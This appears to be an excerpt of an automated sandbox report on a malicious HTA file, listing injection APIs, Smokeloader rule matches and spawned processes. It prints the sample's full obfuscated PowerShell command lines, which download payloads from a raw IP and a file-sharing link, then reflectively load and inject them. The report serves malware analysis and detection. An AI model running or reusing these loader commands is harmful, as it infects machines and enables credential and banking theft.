Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D64B92 RtlMoveMemory,NtUnmapViewOfSection,	17_2_02D64B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D633C3 NtQueryInformationFile,	17_2_02D633C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D6349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	17_2_02D6349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D6342B NtQueryObject,NtQueryObject,RtlMoveMemory,	17_2_02D6342B
Source: C:\Windows\explorer.exe	Code function: 18_2_001E38B0 NtUnmapViewOfSection,	18_2_001E38B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00661016 RtlMoveMemory,NtUnmapViewOfSection,	19_2_00661016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_03043D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,	20_2_03043D8D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_03042E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,	20_2_03042E1B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_03041F4E NtCreateSection,NtMapViewOfSection,	20_2_03041F4E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 20_2_03041FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	20_2_03041FE5
Source: C:\Windows\explorer.exe	Code function: 21_2_00715300 NtUnmapViewOfSection,	21_2_00715300
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00321016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	22_2_00321016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00321819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	22_2_00321819
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_00321A80 NtCreateSection,NtMapViewOfSection,	22_2_00321A80
Source: C:\Windows\explorer.exe	Code function: 26_2_0072355C NtUnmapViewOfSection,	26_2_0072355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D51016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	27_2_02D51016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	27_2_02D518BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 27_2_02D51B26 NtCreateSection,NtMapViewOfSection,	27_2_02D51B26
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB370C NtUnmapViewOfSection,	28_2_00AB370C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_02B998D6	9_2_02B998D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_02B99E10	9_2_02B99E10
Source: C:\Windows\explorer.exe	Code function: 14_2_03442840	14_2_03442840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D62198	17_2_02D62198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D6C2F9	17_2_02D6C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D7B35C	17_2_02D7B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02DB4438	17_2_02DB4438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D7B97E	17_2_02D7B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D66E6A	17_2_02D66E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_02D85F08	17_2_02D85F08
Source: C:\Windows\explorer.exe	Code function: 18_2_001E1E20	18_2_001E1E20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0066170B	19_2_0066170B
Source: C:\Windows\explorer.exe	Code function: 21_2_00712C00	21_2_00712C00
Source: C:\Windows\explorer.exe	Code function: 26_2_00722860	26_2_00722860
Source: C:\Windows\explorer.exe	Code function: 26_2_00722054	26_2_00722054
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB2A04	28_2_00AB2A04
Source: C:\Windows\explorer.exe	Code function: 28_2_00AB20F4	28_2_00AB20F4

Source: C:\Windows\SysWOW64\explorer.exe

Code function: String function: 02D68801 appears 38 times

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3484 -s 724

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2034
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2358
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2034	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2358	Jump to behavior

Source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6168, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/36@2/3

Source: C:\Windows\explorer.exe

Code function: 14_2_03443BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,

14_2_03443BF4

Source: C:\Windows\explorer.exe

Code function: 14_2_034435E8 CoCreateInstance,

14_2_034435E8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestnetworkwhichgivebestthingsentirelifewithme[1].tiff

Jump to behavior

Source: C:\Users\user\AppData\Roaming\djvbaae	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfmfrl0q.rww.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3B8F.tmp.17.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\djvbaae C:\Users\user\AppData\Roaming\djvbaae
Source: C:\Users\user\AppData\Roaming\djvbaae	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3484 -s 724
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"	Jump to behavior
